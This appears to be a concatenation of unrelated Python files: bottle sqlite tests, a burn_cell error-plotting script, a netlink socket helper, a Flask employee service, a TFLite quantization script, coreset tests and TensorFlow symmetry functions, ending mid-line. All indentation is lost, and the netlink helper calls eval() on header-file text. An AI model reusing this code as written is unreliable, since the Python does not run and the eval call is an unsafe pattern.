@self.app.get('/')
def test(db):
# task can not be null, raise an IntegrityError
db.execute("INSERT INTO todo (id) VALUES (1)")
# TODO: assert HTTPError 500
self._request('/')
self.assert_records(0)
def test_autocommit(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
self._request('/')
self.assert_records(1)
def test_not_autocommit(self):
@self.app.get('/', sqlite={'autocommit': False})
def test(db):
self._insert_into(db)
self._request('/')
self.assert_records(0)
def test_commit_on_redirect(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
bottle.redirect('/')
self._request('/')
self.assert_records(1)
def test_commit_on_abort(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
bottle.abort()
self._request('/')
self.assert_records(0)
def _request(self, path, method='GET'):
return self.app({'PATH_INFO': path, 'REQUEST_METHOD': method},
lambda x, y: None)
def _insert_into(self, db):
sql = "INSERT INTO todo (task) VALUES ('PASS')"
db.execute(sql)
def assert_records(self, count):
cursor = self.conn.execute("SELECT COUNT(*) FROM todo")
self.assertEqual((count,), cursor.fetchone())
if __name__ == '__main__':
unittest.main()
|
python
|
# This code is designed to compare the absolute difference between one
# reference burn_cell test and multiple other burn_cell tests.
# burn_cell_testing.py must be run before running this.
# Around line 195, you choose which elements you will compare the xn and ydot of
# To change what you investigate, you must change what indices in
# short_spec_names you are iterating over
#
# This code is not designed to analyze the error between tests from two networks
#!/usr/bin/env python
from __future__ import print_function
import argparse
import glob
import numpy as np
from cycler import cycler
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument('runprefix', type=str,
help='Prefix of the output run files. We look for files named as [prefix]_[0-9]*')
parser.add_argument('--filenum', action='store_true', help='If --filenum, plot vs. file number')
parser.add_argument('--logtime', action='store_true', help='If --logtime, plot Log10(time).')
parser.add_argument('--tlo', type=float, help='Time lower limit')
parser.add_argument('--thi', type=float, help='Time upper limit')
parser.add_argument('--nlo', type=float, help='File num lower limit')
parser.add_argument('--nhi', type=float, help='File num upper limit')
args = parser.parse_args()
# Initializing varibales and loading in data
print('Initializing')
runprefix = args.runprefix
file_testprefixes = open('{}_testprefixes.txt'.format(runprefix), 'r')
testprefixes = []
for line in file_testprefixes:
testprefixes.append('{}'.format(line.strip()))
file_testprefixes.close()
file_specs = open('{}_{}_short_spec_names.txt'.format(runprefix, testprefixes[0]), 'r')
short_spec_names = []
for line in file_specs:
short_spec_names.append(line.strip())
file_specs.close()
nspec = len(short_spec_names)
inputs = []
for i in range(len(testprefixes)):
# i corresponds to the index of a test prefix
inputs.append([])
file_inputs = open('{}_{}_inputs.txt'.format(runprefix, testprefixes[i]))
for line in file_inputs:
inputs[i].append('{}'.format(line.strip()))
file_inputs.close()
# Init time, temp, ener, xn, ydot
xn = []
ydot = []
fnum = []
temp = []
dtime = []
time = []
ener = []
denerdt = []
for prefix in range(len(testprefixes)):
xn.append([])
ydot.append([])
for n in range(nspec):
xn[prefix].append(np.loadtxt('{}_{}_xn{}.txt'.format(args.runprefix, testprefixes[prefix], n)))
ydot[prefix].append(np.loadtxt('{}_{}_ydot{}.txt'.format(args.runprefix, testprefixes[prefix], n)))
temp.append(np.loadtxt('{}_{}_temp.txt'.format(args.runprefix, testprefixes[prefix])))
ener.append(np.loadtxt('{}_{}_ener.txt'.format(args.runprefix, testprefixes[prefix])))
denerdt.append(np.loadtxt('{}_{}_denerdt.txt'.format(args.runprefix, testprefixes[prefix])))
dtime = np.loadtxt('{}_{}_dtime.txt'.format(args.runprefix, testprefixes[0]))
time = np.loadtxt('{}_{}_time.txt'.format(args.runprefix, testprefixes[0]))
fnum = np.loadtxt('{}_{}_fnum.txt'.format(args.runprefix, testprefixes[0]))
## Define RGBA to HEX
def rgba_to_hex(rgba):
r = int(rgba[0]*255.0)
g = int(rgba[1]*255.0)
b = int(rgba[2]*255.0)
return '#{:02X}{:02X}{:02X}'.format(r,g,b)
## PLOTTING
# Figure out time axis limits
if args.tlo and args.thi:
ltlim = [args.tlo, args.thi]
elif args.tlo:
ltlim = [args.tlo, time[-1]]
elif args.thi:
ltlim = [time[0], args.thi]
else:
ltlim = [time[0], time[-1]]
if args.logtime:
time = np.log10(time)
ltlim = np.log10(ltlim)
# Number axis limits
if args.nlo and args.nhi:
fnlim = [args.nlo, args.nhi]
elif args.tlo:
fnlim = [args.nlo, fnum[-1]]
elif args.thi:
fnlim = [fnum[0], args.nhi]
else:
fnlim = [fnum[0], fnum[-1]]
# Time or file number selection
if args.filenum or args.nlo or args.nhi:
plot_vs_fnum = True
xlabel = r'$\mathrm{Output \#}$'
xvec = fnum
xlim = fnlim
else:
xvec = time
xlim = ltlim
if args.logtime:
xlabel = r'$\mathrm{Log_{10}}$'
else:
xlabel = r'$\mathrm{Time~(s)}$'
# Get set of colors to use for abundances
cm = plt.get_cmap('nipy_spectral')
clist = [cm(1.0*i/nspec) for i in range(nspec)]
hexclist = [rgba_to_hex(ci) for ci in clist]
# Initialize figures and axes for the future plots
plt.figure(1, figsize=(6,9))
ax = plt.subplot(211)
ax.set_prop_cycle(cycler('color', hexclist))
errx = plt.subplot(212)
errx.set_prop_cycle(cycler('color', hexclist))
plt.figure(2, figsize=(6,9))
ay = plt.subplot(211)
ay.set_prop_cycle(cycler('color', hexclist))
erry = plt.subplot(212)
erry.set_prop_cycle(cycler('color', hexclist))
plt.figure(3, figsize=(5,9))
aT = plt.subplot(211)
errT = plt.subplot(212)
plt.figure(4, figsize=(5,9))
ae = plt.subplot(211)
erre = plt.subplot(212)
# Initialize arrays to contain values for plotting
diffx = []
diffydot = []
difftemp = []
diffdenerdt = []
line_styles = ['solid', 'dashed', 'dotted', 'dashdot']
# Plotting the reference data
print('Plotting the reference data from: {}'.format(testprefixes[0]))
for x in range(len(short_spec_names)):
# x corresponds to each molecule in the list of species
plt.figure(1)
ax.semilogy(xvec, xn[0][x], label='{}-{}'.format(short_spec_names[x], testprefixes[0]), linestyle = line_styles[0])
plt.figure(2)
ay.semilogy(xvec, ydot[0][x], label='{}-{}'.format(short_spec_names[x], testprefixes[0]), linestyle = line_styles[0])
plt.figure(3)
aT.semilogy(xvec, temp[0], label=testprefixes[0], linestyle = line_styles[0])
plt.figure(4)
ae.semilogy(xvec, denerdt[0], label=testprefixes[0], linestyle = line_styles[0])
# Plotting the data compared to reference and the error
for i in range(1, len(testprefixes)):
# In this context i cooresponds to a test prefix to be compared
# to the data from a chosen data set
print('Plotting data from: {}'.format(testprefixes[i]))
difftemp.append([])
diffdenerdt.append([])
for n in range(len(xvec)):
# n is for every time step from 0 to tmax
difftemp[i-1].append(abs(temp[0][n] - temp[i][n]))
diffdenerdt[i-1].append(abs(denerdt[0][n] - denerdt[i][n]))
plt.figure(3)
# Uncomment the following line and the commented ae, ax, and ay
# to add additional graphs to the top graph in the output files
#aT.semilogy(xvec, temp[i], label=testprefixes[i], linestyle = line_styles[i])
errT.semilogy(xvec, difftemp[i-1], label=testprefixes[i], linestyle = line_styles[i-1])
plt.figure(4)
#ae.semilogy(xvec, denerdt[i], label=testprefixes[i], linestyle = line_styles[i])
erre.semilogy(xvec, diffdenerdt[i-1], label=testprefixes[i], linestyle = line_styles[i-1])
diffx.append([])
diffydot.append([])
# This is where you decide which elements to investigate the xn and ydot of
for x in range(nspec):
# x is for each species involved
diffx[i-1].append([])
diffydot[i-1].append([])
for n in range(len(xvec)):
# n is for every time step from 0 to tmax
diffx[i-1][x].append(abs(xn[0][x][n] - xn[i][x][n]))
diffydot[i-1][x].append(abs(ydot[0][x][n] - ydot[i][x][n]))
plt.figure(1)
#ax.semilogy(xvec, xn[i][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i])
errx.semilogy(xvec, diffx[i-1][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i-1])
plt.figure(2)
#ay.semilogy(xvec, ydot[i][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i])
erry.plot(xvec, diffydot[i-1][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i-1])
# Mass Fraction Figure
print('Compiling Mass Fraction graph.')
plt.figure(1)
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ax.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
ax.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ax.transAxes)
ax.set_xlabel(xlabel, fontsize=10)
ax.set_ylabel('$\\mathrm{Log_{10} X}$', fontsize=10)
ax.set_title('Mass Fraction')
ax.set_xlim(xlim)
ax.tick_params(axis='both', which='both', labelsize=5)
box = errx.get_position()
errx.set_position([box.x0, box.y0, box.width * 0.8, box.height])
errx.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
errx.set_xlabel(xlabel, fontsize=10)
errx.set_ylabel('$\\mathrm{Log_{10} X}$', fontsize=10)
errx.set_title('Absolute Errors in Mass Fraction', fontsize=15)
errx.set_xlim(xlim)
errx.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_xn_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Moller Fractions
print('Compiling Moller Fraction graph.')
plt.figure(2)
box = ay.get_position()
ay.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ay.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
ay.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ay.transAxes)
ay.set_xlabel(xlabel, fontsize=10)
ay.set_ylabel('$\\mathrm{Log_{10} \\dot{Y}}$', fontsize=10)
ay.set_title('Moller Fraction')
ay.set_xlim(xlim)
ay.tick_params(axis='both', which='both', labelsize=5)
box = erry.get_position()
erry.set_position([box.x0, box.y0, box.width * 0.8, box.height])
erry.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
erry.set_xlabel(xlabel, fontsize=10)
erry.set_ylabel('$\\mathrm{Log_{10} \\dot{Y}}$', fontsize=10)
erry.set_title('Absolute Errors in Moller Fraction', fontsize=15)
erry.set_xlim(xlim)
erry.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_y_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Temperature Figure
print('Compiling Temperature graph.')
plt.figure(3)
aT.legend(loc='upper left', fontsize = 5)
aT.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=aT.transAxes)
aT.set_xlabel(xlabel, fontsize=10)
aT.set_ylabel('$\\mathrm{Log_{10} T~(K)}$', fontsize=10)
aT.set_title('Temperature')
aT.set_xlim(xlim)
aT.tick_params(axis='both', which='both', labelsize=5)
errT.legend(loc='upper left', fontsize = 5)
errT.set_prop_cycle(cycler('color', hexclist))
errT.set_xlabel(xlabel, fontsize=10)
errT.set_ylabel('$\\mathrm{Log_{10} T~(K)}$', fontsize=10)
errT.set_title('Absolute Error in Temperature', fontsize=15)
errT.set_xlim(xlim)
errT.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_T_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Energy Generation Rate
print('Compiling Enerergy Generation Rate graph.')
plt.figure(4)
ae.legend(loc='upper left', fontsize = 5)
ae.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ae.transAxes)
ae.set_prop_cycle(cycler('color', hexclist))
ae.set_xlabel(xlabel, fontsize=10)
ae.set_ylabel('$\\mathrm{Log_{10} \\dot{e}~(erg/g/s)}$', fontsize=10)
ae.set_title('Energy Generation Rate')
ae.set_xlim(xlim)
ae.tick_params(axis='both', which='both', labelsize=5)
erre.legend(loc='upper left', fontsize = 5)
erre.set_prop_cycle(cycler('color', hexclist))
erre.set_xlabel(xlabel, fontsize=10)
erre.set_ylabel('$\\mathrm{Log_{10} \\dot{e}~(erg/g/s)}$', fontsize=10)
erre.set_title('Absolute Error in Energy Generation Rate', fontsize=15)
erre.set_xlim(xlim)
erre.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_edot_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
|
python
|
#!/usr/bin/python
import socket,os
import platform
""" NETLINK related stuff
Astrit Zhushi 2011, [email protected]
"""
NETLINK_CONNECTOR=11
NETLINK_ADD_MEMBERSHIP=1
def get_cn_idx_iwlagn():
uname = platform.uname()[2]
infile = open("/usr/src/linux-headers-%s/include/linux/connector.h"
%(uname), "r")
flag = False
for line in infile:
if line.find("CN_IDX_IWLAGN") == -1:
continue
line = line.strip().split()
CN_IDX_IWLAGN = eval(line[2])
flag = True
break
infile.close()
if flag:
return CN_IDX_IWLAGN
raise IOError("CN_IDX_IWLAGN not found in connector.h")
def get_iwlnl_socket() :
CN_IDX_IWLAGN = get_cn_idx_iwlagn()
s = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM, NETLINK_CONNECTOR)
pid = os.getpid()
s.bind((pid,CN_IDX_IWLAGN))
s.setsockopt(270, NETLINK_ADD_MEMBERSHIP, CN_IDX_IWLAGN)
return s
|
python
|
"""
Employee service.
"""
from department_app import db
from department_app.models.department import Department
from department_app.models.employee import Employee
def add_employee_service(forename, surname, birthdate, department_id, salary):
"""
Adds employee to db.
:param forename: employee first name
:param surname: employee Surname
:param birthdate: employee birthdate
:param salary: employee salary
:param department_id: employee department id
:return: None
"""
employee = Employee(
forename=forename,
surname=surname,
birthdate=birthdate,
salary=salary,
department=department_id
)
db.session.add(employee)
db.session.commit()
def update_employee_service(employee_id, forename=None, surname=None, birthdate=None, salary=None, department_id=None):
"""
Updates employee into db.
:param employee_id: employee id
:param forename: employee first name
:param surname: employee Surname
:param birthdate: employee birthdate
:param salary: employee salary
:param department_id: employee department id
:return: None
"""
employee = Employee.query.get_or_404(employee_id)
if forename:
employee.forename = forename
if surname:
employee.surname = surname
if birthdate:
employee.birthdate = birthdate
if salary:
employee.salary = salary
if department_id:
employee.department_id = department_id
db.session.add(employee)
db.session.commit()
def get_employee_by_id_service(employee_id):
"""
Returns employee from db.
:param employee_id: employee id
:return: employee
"""
return Employee.query.filter_by(id=employee_id).first()
def get_by_birthdate_service(date_from, date_to):
"""
Returns all employees with birthdate in mentioned period from db.
:param date_from: start_date
:param date_to: end_date
:return: list of all employees with birthdate in mentioned period
"""
return Employee.query.filter(Employee.birthdate.between(date_from, date_to)).all()
def get_all_employees_service():
"""
Returns all employees from db.
:return: list of all employees
"""
return Employee.query.all()
def delete_employee_service(employee_id):
"""
Deletes employee in db.
:param employee_id: employee id
:return: None
"""
employee = Employee.query.get_or_404(employee_id)
db.session.delete(employee)
db.session.commit()
def employee_to_dict(employee_id):
"""
Returns employee dictionary representation.
:param employee_id: employee id
:return: employee dictionary representation
"""
employee = get_employee_by_id_service(employee_id)
return {
'id': employee.id,
'forename': employee.forename,
'surname': employee.surname,
'birthdate': employee.birthdate.strftime('%Y-%m-%d'),
'salary': employee.salary,
'department': Department.query.get_or_404(employee.department_id).name
}
def get_all_employees_for_department(department_id):
"""
Returns all employees in the department from database.
:param department_id: department id
:return: list of all employees in the department
"""
return Employee.query.filter_by(department_id=department_id).all()
|
python
|
### tensorflow==2.3.1
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
def representative_dataset_gen_480x640():
for data in raw_test_data.take(10):
image = data['image'].numpy()
image = tf.image.resize(image, (480, 640))
image = image[np.newaxis,:,:,:]
image = image - 127.5
image = image * 0.007843
yield [image]
raw_test_data, info = tfds.load(name="coco/2017", with_info=True, split="test", data_dir="~/TFDS", download=False)
# Integer Quantization - Input/Output=float32
height = 480
width = 640
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model_nyu_{}x{}'.format(height, width))
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_dataset_gen_480x640
tflite_model = converter.convert()
with open('dense_depth_nyu_{}x{}_integer_quant.tflite'.format(height, width), 'wb') as w:
w.write(tflite_model)
print('Integer Quantization complete! - dense_depth_nyu_{}x{}_integer_quant.tflite'.format(height, width))
|
python
|
import bayesiancoresets as bc
import numpy as np
import warnings
warnings.filterwarnings('ignore', category=UserWarning) #tests will generate warnings (due to pathological data design for testing), just ignore them
np.seterr(all='raise')
np.set_printoptions(linewidth=500)
np.random.seed(100)
tol = 1e-9
def test_empty():
x = np.random.randn(0, 0)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones"
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
def test_one():
x = np.random.randn(1, 3)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones: "+str(fd.weights())
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
def test_many():
x = np.random.randn(10, 3)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones "+str(fd.weights())
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
|
python
|
# MIT License
#
# Copyright (c) 2018 Silvia Amabilino
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module contains an implementation of the the symmetry functions used in the Parkhill paper https://arxiv.org/pdf/1711.06385.pdf.
This implementation is different. It works for both data sets where all the molecules are the same but in different configurations and
for datasets with all different molecules.
Note: it is all in single precision.
"""
import tensorflow as tf
import numpy as np
def acsf_rad(xyzs, Zs, radial_cutoff, radial_rs, eta):
"""
This does the radial part of the symmetry function (G2 function in Behler's papers). It works only for datasets where
all samples are the same molecule but in different configurations.
:param xyzs: tf tensor of shape (n_samples, n_atoms, 3) contaning the coordinates of each atom in each data sample
:param Zs: tf tensor of shape (n_samples, n_atoms) containing the atomic number of each atom in each data sample
:param radial_cutoff: scalar tensor
:param radial_rs: tf tensor of shape (n_rs,) with the R_s values
:param eta: tf scalar
:return: tf tensor of shape (n_samples, n_atoms, n_atoms, n_rs)
"""
# Calculating the distance matrix between the atoms of each sample
with tf.name_scope("Distances"):
dxyzs = tf.expand_dims(xyzs, axis=2) - tf.expand_dims(xyzs, axis=1)
dist_tensor = tf.cast(tf.norm(dxyzs, axis=3), dtype=tf.float32) # (n_samples, n_atoms, n_atoms)
# Indices of terms that need to be zero (diagonal elements)
mask_0 = tf.zeros(tf.shape(dist_tensor))
mask_1 = tf.ones(tf.shape(Zs))
where_eq_idx = tf.cast(tf.matrix_set_diag(mask_0, mask_1), dtype=tf.bool)
# Calculating the exponential term
with tf.name_scope("Exponential_term"):
expanded_rs = tf.expand_dims(tf.expand_dims(tf.expand_dims(radial_rs, axis=0), axis=0), axis=0) # (1, 1, 1, n_rs)
expanded_dist = tf.expand_dims(dist_tensor, axis=-1) # (n_samples, n_atoms, n_atoms, 1)
exponent = - eta * tf.square(tf.subtract(expanded_dist, expanded_rs))
exp_term = tf.exp(exponent) # (n_samples, n_atoms, n_atoms, n_rs)
# Calculating the fc terms
with tf.name_scope("fc_term"):
# Finding where the distances are less than the cutoff
where_less_cutoff = tf.less(dist_tensor, radial_cutoff)
# Calculating all of the fc function terms
fc = 0.5 * (tf.cos(3.14159265359 * dist_tensor / radial_cutoff) + 1.0)
# Setting to zero the terms where the distance is larger than the cutoff
zeros = tf.zeros(tf.shape(dist_tensor), dtype=tf.float32)
cut_off_fc = tf.where(where_less_cutoff, fc, zeros) # (n_samples, n_atoms, n_atoms)
# Cleaning up diagonal terms
clean_fc_term = tf.where(where_eq_idx, zeros, cut_off_fc)
# Cleaning up dummy atoms terms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
cleaner_fc_term = tf.where(dummy_mask, clean_fc_term, zeros)
# Multiplying exponential and fc terms
expanded_fc = tf.expand_dims(cleaner_fc_term, axis=-1) # (n_samples, n_atoms, n_atoms, 1)
with tf.name_scope("Rad_term"):
presum_term = tf.multiply(expanded_fc, exp_term) # (n_samples, n_atoms, n_atoms, n_rs)
return presum_term
def acsf_ang(xyzs, Zs, angular_cutoff, angular_rs, theta_s, zeta, eta):
"""
This does the angular part of the symmetry function as mentioned here: https://arxiv.org/pdf/1711.06385.pdf
It only works for systems where all the samples are the same molecule but in different configurations.
:param xyzs: tf tensor of shape (n_samples, n_atoms, 3) contaning the coordinates of each atom in each data sample
:param Zs: tf tensor of shape (n_samples, n_atoms) containing the atomic number of each atom in each data sample
:param angular_cutoff: scalar tensor
:param angular_rs: tf tensor of shape (n_ang_rs,) with the equivalent of the R_s values from the G2
:param theta_s: tf tensor of shape (n_thetas,)
:param zeta: tf tensor of shape (1,)
:param eta: tf tensor of shape (1,)
:return: tf tensor of shape (n_samples, n_atoms, n_atoms, n_atoms, n_ang_rs * n_thetas)
"""
# Finding the R_ij + R_ik term
with tf.name_scope("Sum_distances"):
dxyzs = tf.expand_dims(xyzs, axis=2) - tf.expand_dims(xyzs, axis=1)
dist_tensor = tf.cast(tf.norm(dxyzs, axis=3), dtype=tf.float32) # (n_samples, n_atoms, n_atoms)
# This is the tensor where element sum_dist_tensor[0,1,2,3] is the R_12 + R_13 in the 0th data sample
sum_dist_tensor = tf.expand_dims(dist_tensor, axis=3) + tf.expand_dims(dist_tensor,
axis=2) # (n_samples, n_atoms, n_atoms, n_atoms)
# Problem with the above tensor: we still have the R_ii + R_ik distances which are non zero and could be summed
# These need to be set to zero
n_atoms = Zs.get_shape().as_list()[1]
zarray = np.zeros((n_atoms, n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(n_atoms):
for k in range(n_atoms):
if i == j or i == k or j == k:
zarray[i, j, k] = 1
# Make a bool tensor of the indices
where_eq_idx = tf.tile(tf.expand_dims(tf.convert_to_tensor(zarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(sum_dist_tensor)[0], 1, 1, 1])
# For all the elements that are true in where_eq_idx, turn the elements of sum_dist_tensor to zero
zeros_1 = tf.zeros(tf.shape(sum_dist_tensor), dtype=tf.float32)
# Now finding the fc terms
with tf.name_scope("Fc_term"):
# 1. Find where Rij and Rik are < cutoff
where_less_cutoff = tf.less(dist_tensor, angular_cutoff)
# 2. Calculate the fc on the Rij and Rik tensors
fc_1 = 0.5 * (tf.cos(3.14159265359 * dist_tensor / angular_cutoff) + 1.0)
# 3. Apply the mask calculated in 1. to zero the values for where the distances are > than the cutoff
zeros_2 = tf.zeros(tf.shape(dist_tensor), dtype=tf.float32)
cut_off_fc = tf.where(where_less_cutoff, fc_1, zeros_2) # (n_samples, n_atoms, n_atoms)
# 4. Multiply the two tensors elementwise
fc_term = tf.multiply(tf.expand_dims(cut_off_fc, axis=3),
tf.expand_dims(cut_off_fc, axis=2)) # (n_samples, n_atoms, n_atoms, n_atoms)
# 5. Cleaning up the terms that should be zero because there are equal indices
clean_fc_term = tf.where(where_eq_idx, zeros_1, fc_term)
# 6. Cleaning up the terms due to the dummy atoms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask_2d = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
dummy_mask_3d = tf.logical_and(tf.expand_dims(dummy_mask_2d, axis=1), tf.expand_dims(tf.expand_dims(dummy_atoms, axis=-1), axis=-1))
cleaner_fc_term = tf.where(dummy_mask_3d, clean_fc_term, zeros_1)
# Now finding the theta_ijk term
with tf.name_scope("Theta"):
# Doing the dot products of all the possible vectors
dots_dxyzs = tf.cast(tf.reduce_sum(tf.multiply(tf.expand_dims(dxyzs, axis=3), tf.expand_dims(dxyzs, axis=2)),
axis=4), dtype=tf.float32) # (n_samples, n_atoms, n_atoms, n_atoms)
# Doing the products of the magnitudes
dist_prod = tf.multiply(tf.expand_dims(dist_tensor, axis=3),
tf.expand_dims(dist_tensor, axis=2)) # (n_samples, n_atoms, n_atoms, n_atoms)
# Dividing the dot products by the magnitudes to obtain cos theta
cos_theta = tf.divide(dots_dxyzs, dist_prod)
# Taking care of the values that due numerical error are just above 1.0 or below -1.0
cut_cos_theta = tf.clip_by_value(cos_theta, tf.constant(-1.0), tf.constant(1.0))
# Applying arc cos to find the theta value
theta = tf.acos(cut_cos_theta) # (n_samples, n_atoms, n_atoms, n_atoms)
# Removing the NaNs created by dividing by zero
clean_theta = tf.where(where_eq_idx, zeros_1, theta)
# cleaning up NaNs due by dummy atoms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask_2d = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
dummy_mask_3d = tf.logical_and(tf.expand_dims(dummy_mask_2d, axis=1),
tf.expand_dims(tf.expand_dims(dummy_atoms, axis=-1), axis=-1))
cleaner_theta = tf.where(dummy_mask_3d, clean_theta, zeros_1)
# Finding the (0.5 * clean_sum_dist - R_s) term
with tf.name_scope("Exp_term"):
# Augmenting the dims of angular_rs
expanded_rs = tf.expand_dims(tf.expand_dims(tf.expand_dims(tf.expand_dims(angular_rs, axis=0), axis=0), axis=0),
axis=0) # (1, 1, 1, 1, n_rs)
# Augmenting the dim of clean_sum_dist *0.5
# expanded_sum = tf.expand_dims(clean_sum_dist * 0.5, axis=-1)
expanded_sum = tf.expand_dims(sum_dist_tensor * 0.5, axis=-1)
# Combining them
brac_term = tf.subtract(expanded_sum, expanded_rs)
# Finally making the exponential term
exponent = - eta * tf.square(brac_term)
exp_term = tf.exp(exponent) # (n_samples, n_atoms, n_atoms, n_atoms, n_rs)
# Finding the cos(theta - theta_s) term
with tf.name_scope("Cos_term"):
# Augmenting the dimensions of theta_s
expanded_theta_s = tf.expand_dims(tf.expand_dims(tf.expand_dims(tf.expand_dims(theta_s, axis=0), axis=0), axis=0),
axis=0)
# Augmenting the dimensions of theta
expanded_theta = tf.expand_dims(cleaner_theta, axis=-1)
# Subtracting them and do the cos
cos_theta_term = tf.cos(
tf.subtract(expanded_theta, expanded_theta_s)) # (n_samples, n_atoms, n_atoms, n_atoms, n_theta_s)
# Make the whole cos term of the sum
cos_term = tf.pow(tf.add(tf.ones(tf.shape(cos_theta_term), dtype=tf.float32), cos_theta_term),
zeta) # (n_samples, n_atoms, n_atoms, n_atoms, n_theta_s)
# Final product of terms inside the sum time by 2^(1-zeta)
expanded_fc = tf.expand_dims(tf.expand_dims(cleaner_fc_term, axis=-1), axis=-1, name="Expanded_fc")
expanded_cos = tf.expand_dims(cos_term, axis=-2, name="Expanded_cos")
expanded_exp = tf.expand_dims(exp_term, axis=-1, name="Expanded_exp")
const = tf.pow(tf.constant(2.0, dtype=tf.float32), (1.0 - zeta))
with tf.name_scope("Ang_term"):
prod_of_terms = const * tf.multiply(tf.multiply(expanded_cos, expanded_exp),
expanded_fc) # (n_samples, n_atoms, n_atoms, n_atoms, n_rs, n_theta_s)
# Reshaping to shape (n_samples, n_atoms, n_atoms, n_atoms, n_rs*n_theta_s)
presum_term = tf.reshape(prod_of_terms,
[tf.shape(prod_of_terms)[0], n_atoms, n_atoms, n_atoms,
theta_s.shape[0] * angular_rs.shape[0]])
return presum_term
def sum_rad(pre_sum, Zs, elements_list, radial_rs):
"""
Sum of the terms in the radial part of the symmetry function. The terms corresponding to the same neighbour identity
are summed together.
:param pre_sum: tf tensor of shape (n_samples, n_atoms, n_atoms, n_rs)
:param Zs: tf tensor of shape (n_samples, n_atoms)
:param elements_list: np.array of shape (n_elements,)
:param radial_rs: tf tensor of shape (n_rad_rs,)
:return: tf tensor of shape (n_samples, n_atoms, n_rad_rd * n_elements)
"""
n_atoms = Zs.get_shape().as_list()[1]
n_elements = len(elements_list)
n_rs = radial_rs.get_shape().as_list()[0]
## Making a matrix of all the possible neighbouring atoms
# No need to clean up diagonal elements because they are already set to zero in the presum term
neighb_atoms = tf.tile(tf.expand_dims(tf.expand_dims(Zs, axis=1), axis=-1),
